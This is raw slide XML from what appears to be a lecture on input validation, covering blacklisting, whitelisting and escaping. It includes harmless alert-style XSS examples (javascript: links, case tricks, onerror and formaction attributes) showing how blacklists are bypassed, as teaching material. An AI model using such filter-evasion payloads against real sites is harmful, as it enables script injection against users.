            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRP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16</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" alt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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>SQL injection jokes</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89092" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6876256" y="6237312"/>
            <a:ext cx="2133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dirty="0"/>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1200" dirty="0"/>
              <a:t>http://xkcd.com/327/</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="12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17</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Exploits of a M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33" y="2420888"/>
            <a:ext cx="7486022" cy="2304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US" altLang="cs-CZ" dirty="0"/>
              <a:t>Possible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>solutions ?</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18</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" alt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US" altLang="cs-CZ" dirty="0"/>
              <a:t>Possible solutions</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Blacklisting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>List the disallowed cases and ban </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Filter out or reject input</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Whitelisting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>List the allowed cases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Filter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>out other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>or reject input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Escaping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&amp; → &amp;amp	 &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2000" dirty="0"/>
              <a:t>→</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2000" dirty="0" smtClean="0"/>
              <a:t> &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2000" dirty="0"/>
              <a:t>→</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2000" dirty="0" smtClean="0"/>
              <a:t> &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>ready to process everything</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>In size, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>content, encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>, …</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19</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3581198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r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Risks of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t> input</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65539" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Format string vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>URL commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>insertion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>/ injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Ignore vs. reject</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90115" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Be careful: denial-of-service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>When rejecting the input completely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Ignore bad input, use only good input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t> is illegal:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>***</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>LAZY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>***</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>fox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>The LAZY fox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Be careful not to use the original input by mistake</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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20</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-C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n-US" altLang="cs-CZ"/>
              <a:t>Blacklisting</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53251" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>In HTML blacklist &lt; &gt;, particular tags, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>In shells blacklist ` ‘ “ ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>In SQL blacklist ‘ “</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21</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" alt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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Drawbacks of blacklisting</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Important characters/objects can be forgotten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>E.g. you block &lt;script&gt;, but forget JavaScript elsewhere</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0"/>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0" err="1"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0" err="1"/>
              <a:t>Your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0" err="1"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2100" dirty="0"/>
              <a:t>is poor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0"/>
              <a:t>')"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0" err="1"/>
              <a:t>Foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0"/>
              <a:t>&lt;/a&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Lowercase/uppercase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>JAVAscRipt:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>('hi')“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Encoding / charset can change</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Specifications can change</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>HTML4 vs. HTML5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>You switch from bash to C-shell</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22</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Example of blacklisting</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59395" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>New tags in HTML5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>New functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Old blacklists will not catch new functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Whitelisting would do a better job here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59396" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="684213" y="3716338"/>
            <a:ext cx="7823200" cy="14747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a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>video </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>width="320" height="240" controls="controls" onerror="alert('Test')"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>  &lt;source src="movie.mp4" type="video/mp4"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>  &lt;source src="movie.ogg" type="video/ogg"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>Your browser does not support the video tag.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>&lt;/video&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59397" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="684213" y="5392738"/>
            <a:ext cx="7239000" cy="9255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a:t>&lt;form id="f1" /&gt;&lt;button form="f1" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formaction="alert(0)"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>&gt;Test&lt;/button&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" alt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23</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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en-US" altLang="cs-CZ"/>
              <a:t>Whitelisting</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2300" dirty="0"/>
              <a:t>Only alphanumeric characters (username)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0"/>
              <a:t>0123456789 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0" err="1"/>
              <a:t>abcdefghijklmnopqrstuvwxyz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0"/>
              <a:t>ABCDEFGHIJKLMNOPQRSTUVWXYZ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2300" dirty="0"/>
              <a:t>Only numbers, spaces, + and ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2100" dirty="0"/>
              <a:t>Phone numbers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2300" dirty="0"/>
              <a:t>Regex for US states</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="2100" dirty="0"/>
              <a:t>^(AA|AE|AP|AL|AK|AS|AZ|AR|CA|CO|CT|DE|DC|FM|FL|GA|GU| HI|ID|IL|IN|IA|KS|KY|LA|ME|MH|MD|MA|MI|MN|MS|MO|MT|NE| NV|NH|NJ|NM|NY|NC|ND|MP|OH|OK|OR|PW|PA|PR|RI|SC|SD|TN| TX|UT|VT|VI|VA|WA|WV|WI|WY)$ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="23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24</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" alt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n-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56323" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Escape problematic input </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>mysql_real_query</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
